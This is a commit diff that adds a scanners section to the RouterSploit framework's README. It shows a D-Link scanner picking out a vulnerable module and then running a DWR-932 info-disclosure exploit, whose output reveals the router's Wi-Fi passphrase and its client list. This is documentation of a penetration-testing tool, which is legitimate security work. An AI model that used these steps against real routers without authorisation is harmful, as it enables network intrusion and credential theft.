Commit 0efd5b10 by Marcin Bury

usage scanners modules

parent 5b43bccb
...@@ -186,7 +186,67 @@ Set target: ...@@ -186,7 +186,67 @@ Set target:
rsf (SSH Default Creds) > rsf (SSH Default Creds) >
## 3. Scanners
Scanners allow quickly verify if the target is vulnerable to any exploits.
### Pick module
rsf > use scanners/dlink_scan
rsf (D-Link Scanner) > show options
### Options
Target options:
Name Current settings Description
---- ---------------- -----------
target Target address e.g.
port 80 Target port
Set target:
rsf (D-Link Scanner) > set target
[+] {'target': ''}
### Run module
rsf (D-Link Scanner) > run
[+] exploits/dlink/dwr_932_info_disclosure is vulnerable
[-] exploits/dlink/dir_300_320_615_auth_bypass is not vulnerable
[-] exploits/dlink/dsl_2750b_info_disclosure is not vulnerable
[-] exploits/dlink/dns_320l_327l_rce is not vulnerable
[-] exploits/dlink/dir_645_password_disclosure is not vulnerable
[-] exploits/dlink/dir_300_600_615_info_disclosure is not vulnerable
[-] exploits/dlink/dir_300_600_rce is not vulnerable
[+] Device is vulnerable!
- exploits/dlink/dwr_932_info_disclosure
It has been verified that target is vulnerable to dwr\_932\_info\_disclosure exploit. Now use proper module and exploit target.
rsf (D-Link Scanner) > use exploits/dlink/dwr_932_info_disclosure
rsf (D-Link DWR-932 Info Disclosure) > set target
[+] {'target': ''}
rsf (D-Link DWR-932 Info Disclosure) > exploit
[*] Running module...
[*] Decoding JSON value
[+] Exploit success
Parameter Value
--------- -----
get_wps_enable 0
wifi_AP1_enable 1
get_client_list 9c:00:97:00:a3:b3,,IT-PCs,0>40:b8:00:ab:b8:8c,,android-b2e363e04fb0680d,0
wifi_AP1_ssid dlink-DWR-932
get_mac_address c4:00:f5:00:ec:40
wifi_AP1_security_mode 3208,8
wifi_AP1_hidden 0
get_mac_filter_switch 0
wifi_AP1_passphrase MyPaSsPhRaSe
get_wps_mode 0
# License # License
License has been taken from BSD licensing and applied to RouterSploit Framework. License has been taken from BSD licensing and applied to RouterSploit Framework.
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